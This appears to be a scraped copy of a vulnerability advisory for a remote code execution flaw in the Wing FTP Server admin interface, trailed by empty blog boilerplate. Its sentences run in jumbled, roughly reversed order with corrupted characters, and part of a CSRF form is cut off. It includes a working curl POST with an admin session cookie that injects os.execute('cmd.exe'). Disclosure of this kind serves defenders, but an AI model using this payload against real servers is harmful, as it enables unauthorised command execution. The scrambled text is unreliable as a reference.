![]() Vendor requests clarification on impact and various attack scenarios. Vendor responds with requests for details of vulnerabilities. :5466/admin_lua_script.html" method="POST" enctype="text/plain">ġ) Either utilising the LUA Console interface directly and using the os.execute('') method.Ģ) POST directly using CURL with an authenticated cookie:Ĭurl -i -s -k -X 'POST' -b 'admin_lang=english UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' -data-binary $'command=os.execute(\'cmd.exe\')'Īny OS command can be inserted into the os.execute('') method. The attack leverages the LUA CLI to inject commands at the same privilege as the web server. The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server." And it provides admins with a web based interface to administrate the server from anywhere. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. "Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. Vulnerability Type: Improper Control of Generation of Code Vulnerable Versions: 4.4.6 and all previous versions ![]() Change Mirror Download Exploit Title: Wing FTP Server Remote Code Execution vulnerability
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |